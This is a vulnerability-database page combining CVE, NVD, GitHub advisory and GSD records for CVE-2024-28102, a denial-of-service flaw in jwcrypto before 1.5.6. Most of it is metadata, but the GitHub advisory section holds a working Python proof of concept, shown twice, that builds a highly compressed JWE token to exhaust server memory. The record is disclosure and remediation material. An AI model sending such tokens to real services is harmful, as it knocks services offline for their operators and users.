Action not permitted
Modal body text goes here.
Modal Title
Modal Body
CVE-2024-28102 (GCVE-0-2024-28102)
Vulnerability from cvelistv5 – Published: 2024-03-06 21:09 – Updated: 2024-09-09 13:06- CWE-770 - Allocation of Resources Without Limits or Throttling
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-09-09T13:06:44.240Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"name": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97",
"tags": [
"x_refsource_CONFIRM",
"x_transferred"
],
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
},
{
"name": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f",
"tags": [
"x_refsource_MISC",
"x_transferred"
],
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"url": "https://www.vicarius.io/vsociety/posts/denial-of-service-vulnerability-discovered-in-jwcrypto-cve-2024-28102-28103"
},
{
"url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00026.html"
}
],
"title": "CVE Program Container"
},
{
"affected": [
{
"cpes": [
"cpe:2.3:a:latchset:jwcrypto:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "jwcrypto",
"vendor": "latchset",
"versions": [
{
"lessThan": "1.5.6",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"metrics": [
{
"other": {
"content": {
"id": "CVE-2024-28102",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-02T19:56:39.446407Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2024-08-02T20:03:10.383Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "jwcrypto",
"vendor": "latchset",
"versions": [
{
"status": "affected",
"version": "\u003c 1.5.6"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length."
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-770",
"description": "CWE-770: Allocation of Resources Without Limits or Throttling",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2024-03-06T21:09:58.064Z",
"orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"shortName": "GitHub_M"
},
"references": [
{
"name": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97",
"tags": [
"x_refsource_CONFIRM"
],
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
},
{
"name": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f",
"tags": [
"x_refsource_MISC"
],
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
}
],
"source": {
"advisory": "GHSA-j857-7rvv-vj97",
"discovery": "UNKNOWN"
},
"title": "JWCrypto vulnerable to JWT bomb Attack in `deserialize` function"
}
},
"cveMetadata": {
"assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
"assignerShortName": "GitHub_M",
"cveId": "CVE-2024-28102",
"datePublished": "2024-03-06T21:09:58.064Z",
"dateReserved": "2024-03-04T14:19:14.058Z",
"dateUpdated": "2024-09-09T13:06:44.240Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1",
"vulnerability-lookup:meta": {
"epss": {
"cve": "CVE-2024-28102",
"date": "2026-06-27",
"epss": "0.0098",
"percentile": "0.57797"
},
"fkie_nvd": {
"descriptions": "[{\"lang\": \"en\", \"value\": \"JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length.\"}, {\"lang\": \"es\", \"value\": \"JWCrypto implementa las especificaciones JWK, JWS y JWE utilizando criptograf\\u00eda Python. Antes de la versi\\u00f3n 1.5.6, un atacante pod\\u00eda provocar un ataque de denegaci\\u00f3n de servicio al pasar un token JWE malicioso con una alta tasa de compresi\\u00f3n. Cuando el servidor procese este token, consumir\\u00e1 mucha memoria y tiempo de procesamiento. La versi\\u00f3n 1.5.6 corrige esta vulnerabilidad limitando la longitud m\\u00e1xima del token.\"}]",
"id": "CVE-2024-28102",
"lastModified": "2024-11-21T09:05:49.187",
"metrics": "{\"cvssMetricV31\": [{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"cvssData\": {\"version\": \"3.1\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H\", \"baseScore\": 6.8, \"baseSeverity\": \"MEDIUM\", \"attackVector\": \"NETWORK\", \"attackComplexity\": \"LOW\", \"privilegesRequired\": \"HIGH\", \"userInteraction\": \"NONE\", \"scope\": \"CHANGED\", \"confidentialityImpact\": \"NONE\", \"integrityImpact\": \"NONE\", \"availabilityImpact\": \"HIGH\"}, \"exploitabilityScore\": 2.3, \"impactScore\": 4.0}]}",
"published": "2024-03-21T02:52:23.513",
"references": "[{\"url\": \"https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f\", \"source\": \"security-advisories@github.com\"}, {\"url\": \"https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97\", \"source\": \"security-advisories@github.com\"}, {\"url\": \"https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"https://lists.debian.org/debian-lts-announce/2024/09/msg00026.html\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}, {\"url\": \"https://www.vicarius.io/vsociety/posts/denial-of-service-vulnerability-discovered-in-jwcrypto-cve-2024-28102-28103\", \"source\": \"af854a3a-2127-422b-91ae-364da2661108\"}]",
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": "[{\"source\": \"security-advisories@github.com\", \"type\": \"Secondary\", \"description\": [{\"lang\": \"en\", \"value\": \"CWE-770\"}]}]"
},
"nvd": "{\"cve\":{\"id\":\"CVE-2024-28102\",\"sourceIdentifier\":\"security-advisories@github.com\",\"published\":\"2024-03-21T02:52:23.513\",\"lastModified\":\"2026-06-17T07:20:58.403\",\"vulnStatus\":\"Analyzed\",\"cveTags\":[],\"descriptions\":[{\"lang\":\"en\",\"value\":\"JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length.\"},{\"lang\":\"es\",\"value\":\"JWCrypto implementa las especificaciones JWK, JWS y JWE utilizando criptograf\u00eda Python. Antes de la versi\u00f3n 1.5.6, un atacante pod\u00eda provocar un ataque de denegaci\u00f3n de servicio al pasar un token JWE malicioso con una alta tasa de compresi\u00f3n. Cuando el servidor procese este token, consumir\u00e1 mucha memoria y tiempo de procesamiento. La versi\u00f3n 1.5.6 corrige esta vulnerabilidad limitando la longitud m\u00e1xima del token.\"}],\"affected\":[{\"source\":\"security-advisories@github.com\",\"affectedData\":[{\"vendor\":\"latchset\",\"product\":\"jwcrypto\",\"versions\":[{\"version\":\"\u003c 1.5.6\",\"status\":\"affected\"}]}]},{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"affectedData\":[{\"vendor\":\"latchset\",\"product\":\"jwcrypto\",\"defaultStatus\":\"unknown\",\"cpes\":[\"cpe:2.3:a:latchset:jwcrypto:*:*:*:*:*:*:*:*\"],\"versions\":[{\"version\":\"0\",\"lessThan\":\"1.5.6\",\"versionType\":\"custom\",\"status\":\"affected\"}]}]}],\"metrics\":{\"cvssMetricV31\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"cvssData\":{\"version\":\"3.1\",\"vectorString\":\"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H\",\"baseScore\":6.8,\"baseSeverity\":\"MEDIUM\",\"attackVector\":\"NETWORK\",\"attackComplexity\":\"LOW\",\"privilegesRequired\":\"HIGH\",\"userInteraction\":\"NONE\",\"scope\":\"CHANGED\",\"confidentialityImpact\":\"NONE\",\"integrityImpact\":\"NONE\",\"availabilityImpact\":\"HIGH\"},\"exploitabilityScore\":2.3,\"impactScore\":4.0}],\"ssvcV203\":[{\"source\":\"134c704f-9b21-4f2e-91b3-4a467353bcc0\",\"ssvcData\":{\"timestamp\":\"2024-08-02T19:56:39.446407Z\",\"id\":\"CVE-2024-28102\",\"options\":[{\"exploitation\":\"poc\"},{\"automatable\":\"no\"},{\"technicalImpact\":\"partial\"}],\"role\":\"CISA Coordinator\",\"version\":\"2.0.3\"}}]},\"weaknesses\":[{\"source\":\"security-advisories@github.com\",\"type\":\"Secondary\",\"description\":[{\"lang\":\"en\",\"value\":\"CWE-770\"}]}],\"configurations\":[{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:a:latchset:jwcrypto:*:*:*:*:*:*:*:*\",\"versionEndExcluding\":\"1.5.6\",\"matchCriteriaId\":\"E81FD736-42B4-4716-9C91-587FAC88E6B4\"}]}]},{\"nodes\":[{\"operator\":\"OR\",\"negate\":false,\"cpeMatch\":[{\"vulnerable\":true,\"criteria\":\"cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*\",\"matchCriteriaId\":\"FA6FEEC2-9F11-4643-8827-749718254FED\"}]}]}],\"references\":[{\"url\":\"https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97\",\"source\":\"security-advisories@github.com\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Patch\"]},{\"url\":\"https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Vendor Advisory\"]},{\"url\":\"https://lists.debian.org/debian-lts-announce/2024/09/msg00026.html\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Mailing List\",\"Third Party Advisory\"]},{\"url\":\"https://www.vicarius.io/vsociety/posts/denial-of-service-vulnerability-discovered-in-jwcrypto-cve-2024-28102-28103\",\"source\":\"af854a3a-2127-422b-91ae-364da2661108\",\"tags\":[\"Exploit\",\"Press/Media Coverage\",\"Technical Description\"]}]}}",
"vulnrichment": {
"containers": "{\"adp\": [{\"title\": \"CVE Program Container\", \"references\": [{\"url\": \"https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97\", \"name\": \"https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97\", \"tags\": [\"x_refsource_CONFIRM\", \"x_transferred\"]}, {\"url\": \"https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f\", \"name\": \"https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f\", \"tags\": [\"x_refsource_MISC\", \"x_transferred\"]}, {\"url\": \"https://www.vicarius.io/vsociety/posts/denial-of-service-vulnerability-discovered-in-jwcrypto-cve-2024-28102-28103\"}, {\"url\": \"https://lists.debian.org/debian-lts-announce/2024/09/msg00026.html\"}], \"providerMetadata\": {\"orgId\": \"af854a3a-2127-422b-91ae-364da2661108\", \"shortName\": \"CVE\", \"dateUpdated\": \"2024-09-09T13:06:44.240Z\"}}, {\"title\": \"CISA ADP Vulnrichment\", \"metrics\": [{\"other\": {\"type\": \"ssvc\", \"content\": {\"id\": \"CVE-2024-28102\", \"role\": \"CISA Coordinator\", \"options\": [{\"Exploitation\": \"poc\"}, {\"Automatable\": \"no\"}, {\"Technical Impact\": \"partial\"}], \"version\": \"2.0.3\", \"timestamp\": \"2024-08-02T19:56:39.446407Z\"}}}], \"affected\": [{\"cpes\": [\"cpe:2.3:a:latchset:jwcrypto:*:*:*:*:*:*:*:*\"], \"vendor\": \"latchset\", \"product\": \"jwcrypto\", \"versions\": [{\"status\": \"affected\", \"version\": \"0\", \"lessThan\": \"1.5.6\", \"versionType\": \"custom\"}], \"defaultStatus\": \"unknown\"}], \"providerMetadata\": {\"orgId\": \"134c704f-9b21-4f2e-91b3-4a467353bcc0\", \"shortName\": \"CISA-ADP\", \"dateUpdated\": \"2024-08-02T20:03:05.042Z\"}}], \"cna\": {\"title\": \"JWCrypto vulnerable to JWT bomb Attack in `deserialize` function\", \"source\": {\"advisory\": \"GHSA-j857-7rvv-vj97\", \"discovery\": \"UNKNOWN\"}, \"metrics\": [{\"cvssV3_1\": {\"scope\": \"CHANGED\", \"version\": \"3.1\", \"baseScore\": 6.8, \"attackVector\": \"NETWORK\", \"baseSeverity\": \"MEDIUM\", \"vectorString\": \"CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H\", \"integrityImpact\": \"NONE\", \"userInteraction\": \"NONE\", \"attackComplexity\": \"LOW\", \"availabilityImpact\": \"HIGH\", \"privilegesRequired\": \"HIGH\", \"confidentialityImpact\": \"NONE\"}}], \"affected\": [{\"vendor\": \"latchset\", \"product\": \"jwcrypto\", \"versions\": [{\"status\": \"affected\", \"version\": \"\u003c 1.5.6\"}]}], \"references\": [{\"url\": \"https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97\", \"name\": \"https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97\", \"tags\": [\"x_refsource_CONFIRM\"]}, {\"url\": \"https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f\", \"name\": \"https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f\", \"tags\": [\"x_refsource_MISC\"]}], \"descriptions\": [{\"lang\": \"en\", \"value\": \"JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length.\"}], \"problemTypes\": [{\"descriptions\": [{\"lang\": \"en\", \"type\": \"CWE\", \"cweId\": \"CWE-770\", \"description\": \"CWE-770: Allocation of Resources Without Limits or Throttling\"}]}], \"providerMetadata\": {\"orgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"shortName\": \"GitHub_M\", \"dateUpdated\": \"2024-03-06T21:09:58.064Z\"}}}",
"cveMetadata": "{\"cveId\": \"CVE-2024-28102\", \"state\": \"PUBLISHED\", \"dateUpdated\": \"2024-09-09T13:06:44.240Z\", \"dateReserved\": \"2024-03-04T14:19:14.058Z\", \"assignerOrgId\": \"a0819718-46f1-4df5-94e2-005712e83aaa\", \"datePublished\": \"2024-03-06T21:09:58.064Z\", \"assignerShortName\": \"GitHub_M\"}",
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
}
}
FKIE_CVE-2024-28102
Vulnerability from fkie_nvd - Published: 2024-03-21 02:52 - Updated: 2026-06-17 07:20| Vendor | Product | Version | |
|---|---|---|---|
| latchset | jwcrypto | * | |
| debian | debian_linux | 11.0 |
{
"affected": [
{
"affectedData": [
{
"product": "jwcrypto",
"vendor": "latchset",
"versions": [
{
"status": "affected",
"version": "\u003c 1.5.6"
}
]
}
],
"source": "security-advisories@github.com"
},
{
"affectedData": [
{
"cpes": [
"cpe:2.3:a:latchset:jwcrypto:*:*:*:*:*:*:*:*"
],
"defaultStatus": "unknown",
"product": "jwcrypto",
"vendor": "latchset",
"versions": [
{
"lessThan": "1.5.6",
"status": "affected",
"version": "0",
"versionType": "custom"
}
]
}
],
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"
}
],
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:latchset:jwcrypto:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E81FD736-42B4-4716-9C91-587FAC88E6B4",
"versionEndExcluding": "1.5.6",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:debian:debian_linux:11.0:*:*:*:*:*:*:*",
"matchCriteriaId": "FA6FEEC2-9F11-4643-8827-749718254FED",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length."
},
{
"lang": "es",
"value": "JWCrypto implementa las especificaciones JWK, JWS y JWE utilizando criptograf\u00eda Python. Antes de la versi\u00f3n 1.5.6, un atacante pod\u00eda provocar un ataque de denegaci\u00f3n de servicio al pasar un token JWE malicioso con una alta tasa de compresi\u00f3n. Cuando el servidor procese este token, consumir\u00e1 mucha memoria y tiempo de procesamiento. La versi\u00f3n 1.5.6 corrige esta vulnerabilidad limitando la longitud m\u00e1xima del token."
}
],
"id": "CVE-2024-28102",
"lastModified": "2026-06-17T07:20:58.403",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.3,
"impactScore": 4.0,
"source": "security-advisories@github.com",
"type": "Secondary"
}
],
"ssvcV203": [
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"ssvcData": {
"id": "CVE-2024-28102",
"options": [
{
"exploitation": "poc"
},
{
"automatable": "no"
},
{
"technicalImpact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2024-08-02T19:56:39.446407Z",
"version": "2.0.3"
}
}
]
},
"published": "2024-03-21T02:52:23.513",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Patch"
],
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Patch"
],
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Vendor Advisory"
],
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Mailing List",
"Third Party Advisory"
],
"url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00026.html"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Exploit",
"Press/Media Coverage",
"Technical Description"
],
"url": "https://www.vicarius.io/vsociety/posts/denial-of-service-vulnerability-discovered-in-jwcrypto-cve-2024-28102-28103"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-770"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
GHSA-J857-7RVV-VJ97
Vulnerability from github – Published: 2024-03-06 20:00 – Updated: 2025-12-22 18:42Affected version
Vendor: https://github.com/latchset/jwcrypto Version: 1.5.5
Description
An attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this Token, it will consume a lot of memory and processing time.
Poc
from jwcrypto import jwk, jwe
from jwcrypto.common import json_encode, json_decode
import time
public_key = jwk.JWK()
private_key = jwk.JWK.generate(kty='RSA', size=2048)
public_key.import_key(**json_decode(private_key.export_public()))
payload = '{"u": "' + "u" * 400000000 + '", "uu":"' + "u" * 400000000 + '"}'
protected_header = {
"alg": "RSA-OAEP-256",
"enc": "A256CBC-HS512",
"typ": "JWE",
"zip": "DEF",
"kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
recipient=public_key,
protected=protected_header)
enc = jwetoken.serialize(compact=True)
print("-----uncompress-----")
print(len(enc))
begin = time.time()
jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)
print(time.time() - begin)
print("-----compress-----")
payload = '{"u": "' + "u" * 400000 + '", "uu":"' + "u" * 400000 + '"}'
protected_header = {
"alg": "RSA-OAEP-256",
"enc": "A256CBC-HS512",
"typ": "JWE",
"kid": public_key.thumbprint(),
}
jwetoken = jwe.JWE(payload.encode('utf-8'),
recipient=public_key,
protected=protected_header)
enc = jwetoken.serialize(compact=True)
print(len(enc))
begin = time.time()
jwetoken = jwe.JWE()
jwetoken.deserialize(enc, key=private_key)
print(time.time() - begin)
It can be found that when processing Tokens with similar lengths, the processing time of compressed tokens is significantly longer.
Mitigation
To mitigate this vulnerability, it is recommended to limit the maximum token length to 250K. This approach has also been adopted by the JWT library System.IdentityModel.Tokens.Jwt used in Microsoft Azure [1], effectively preventing attackers from exploiting this vulnerability with high compression ratio tokens.
References
[1] CVE-2024-21319
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 1.5.5"
},
"package": {
"ecosystem": "PyPI",
"name": "jwcrypto"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.5.6"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2024-28102"
],
"database_specific": {
"cwe_ids": [
"CWE-770"
],
"github_reviewed": true,
"github_reviewed_at": "2024-03-06T20:00:56Z",
"nvd_published_at": "2024-03-21T02:52:23Z",
"severity": "MODERATE"
},
"details": "## Affected version\nVendor: https://github.com/latchset/jwcrypto\nVersion: 1.5.5\n\n## Description\nAn attacker can cause a DoS attack by passing in a malicious JWE Token with a high compression ratio.\nWhen the server processes this Token, it will consume a lot of memory and processing time.\n\n## Poc\n```python\nfrom jwcrypto import jwk, jwe\nfrom jwcrypto.common import json_encode, json_decode\nimport time\npublic_key = jwk.JWK()\nprivate_key = jwk.JWK.generate(kty=\u0027RSA\u0027, size=2048)\npublic_key.import_key(**json_decode(private_key.export_public()))\n\n\npayload = \u0027{\"u\": \"\u0027 + \"u\" * 400000000 + \u0027\", \"uu\":\"\u0027 + \"u\" * 400000000 + \u0027\"}\u0027\nprotected_header = {\n \"alg\": \"RSA-OAEP-256\",\n \"enc\": \"A256CBC-HS512\",\n \"typ\": \"JWE\",\n \"zip\": \"DEF\",\n \"kid\": public_key.thumbprint(),\n}\njwetoken = jwe.JWE(payload.encode(\u0027utf-8\u0027),\n recipient=public_key,\n protected=protected_header)\nenc = jwetoken.serialize(compact=True)\n\nprint(\"-----uncompress-----\")\n\nprint(len(enc))\n\nbegin = time.time()\n\njwetoken = jwe.JWE()\njwetoken.deserialize(enc, key=private_key)\n\nprint(time.time() - begin)\n\nprint(\"-----compress-----\")\n\npayload = \u0027{\"u\": \"\u0027 + \"u\" * 400000 + \u0027\", \"uu\":\"\u0027 + \"u\" * 400000 + \u0027\"}\u0027\nprotected_header = {\n \"alg\": \"RSA-OAEP-256\",\n \"enc\": \"A256CBC-HS512\",\n \"typ\": \"JWE\",\n \"kid\": public_key.thumbprint(),\n}\njwetoken = jwe.JWE(payload.encode(\u0027utf-8\u0027),\n recipient=public_key,\n protected=protected_header)\nenc = jwetoken.serialize(compact=True)\n\nprint(len(enc))\n\nbegin = time.time()\n\njwetoken = jwe.JWE()\njwetoken.deserialize(enc, key=private_key)\n\nprint(time.time() - begin)\n```\nIt can be found that when processing Tokens with similar lengths, the processing time of compressed tokens is significantly longer.\n\u003cimg width=\"172\" alt=\"image\" src=\"https://github.com/latchset/jwcrypto/assets/133195620/23193327-3cd7-499a-b5aa-28c56af92785\"\u003e\n\n\n\n## Mitigation\nTo mitigate this vulnerability, it is recommended to limit the maximum token length to 250K. This approach has also\nbeen adopted by the JWT library System.IdentityModel.Tokens.Jwt used in Microsoft Azure [1], effectively preventing\nattackers from exploiting this vulnerability with high compression ratio tokens.\n\n## References\n[1] [CVE-2024-21319](https://github.com/AzureAD/azure-activedirectory-identitymodel-extensions-for-dotnet/security/advisories/GHSA-8g9c-28fc-mcx2)",
"id": "GHSA-j857-7rvv-vj97",
"modified": "2025-12-22T18:42:18Z",
"published": "2024-03-06T20:00:56Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-28102"
},
{
"type": "WEB",
"url": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f"
},
{
"type": "PACKAGE",
"url": "https://github.com/latchset/jwcrypto"
},
{
"type": "WEB",
"url": "https://lists.debian.org/debian-lts-announce/2024/09/msg00026.html"
},
{
"type": "WEB",
"url": "https://www.vicarius.io/vsociety/posts/denial-of-service-vulnerability-discovered-in-jwcrypto-cve-2024-28102-28103"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "JWCrypto vulnerable to JWT bomb Attack in `deserialize` function"
}
GSD-2024-28102
Vulnerability from gsd - Updated: 2024-03-05 06:02{
"gsd": {
"metadata": {
"exploitCode": "unknown",
"remediation": "unknown",
"reportConfidence": "confirmed",
"type": "vulnerability"
},
"osvSchema": {
"aliases": [
"CVE-2024-28102"
],
"details": "JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length.",
"id": "GSD-2024-28102",
"modified": "2024-03-05T06:02:29.205231Z",
"schema_version": "1.4.0"
}
},
"namespaces": {
"cve.org": {
"CVE_data_meta": {
"ASSIGNER": "security-advisories@github.com",
"ID": "CVE-2024-28102",
"STATE": "PUBLIC"
},
"affects": {
"vendor": {
"vendor_data": [
{
"product": {
"product_data": [
{
"product_name": "jwcrypto",
"version": {
"version_data": [
{
"version_affected": "=",
"version_value": "\u003c 1.5.6"
}
]
}
}
]
},
"vendor_name": "latchset"
}
]
}
},
"data_format": "MITRE",
"data_type": "CVE",
"data_version": "4.0",
"description": {
"description_data": [
{
"lang": "eng",
"value": "JWCrypto implements JWK, JWS, and JWE specifications using python-cryptography. Prior to version 1.5.6, an attacker can cause a denial of service attack by passing in a malicious JWE Token with a high compression ratio. When the server processes this token, it will consume a lot of memory and processing time. Version 1.5.6 fixes this vulnerability by limiting the maximum token length."
}
]
},
"impact": {
"cvss": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 6.8,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "HIGH",
"scope": "CHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:N/I:N/A:H",
"version": "3.1"
}
]
},
"problemtype": {
"problemtype_data": [
{
"description": [
{
"cweId": "CWE-770",
"lang": "eng",
"value": "CWE-770: Allocation of Resources Without Limits or Throttling"
}
]
}
]
},
"references": {
"reference_data": [
{
"name": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97",
"refsource": "MISC",
"url": "https://github.com/latchset/jwcrypto/security/advisories/GHSA-j857-7rvv-vj97"
},
{
"name": "https://github.com/latchset/jwcrypto/commit/90477a3b6e73da69740e00b8161f53fea19b831f",
"refsource": "MISC",
